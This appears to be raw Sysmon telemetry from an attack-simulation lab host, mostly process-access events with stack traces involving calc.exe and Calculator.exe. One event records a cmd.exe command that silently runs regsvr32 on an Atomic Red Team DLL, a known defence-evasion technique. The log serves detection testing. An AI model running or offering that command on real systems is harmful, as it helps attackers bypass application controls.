Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1c8fa|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000361759Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+1c8c2|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf 10341000x8000000000000000361758Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361757Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+2976b|c:\windows\system32\capabilityaccessmanager.dll+1c7d5|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000361756Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361755Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+28ff4|c:\windows\system32\capabilityaccessmanager.dll+1c666|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000361754Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361753Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361752Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361751Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361750Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361749Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14517|C:\Windows\System32\CapabilityAccessManagerClient.dll+141f0|C:\Windows\System32\CapabilityAccessManagerClient.dll+151b5|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361748Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361747Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-b703-000000001100}6088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361746Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3708-6013-b703-000000001100}6088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000361745Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.307{8e433fbf-3708-6013-b703-000000001100}6088C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "IF "%%PROCESSOR_ARCHITECTURE%%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Temp\notregsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll )" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000361744Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 13241300x8000000000000000361743Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:28.304{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000361742Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361741Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361740Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 11241100x8000000000000000361739Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:13:27.803 10341000x8000000000000000361738Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361737Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361736Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361735Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\W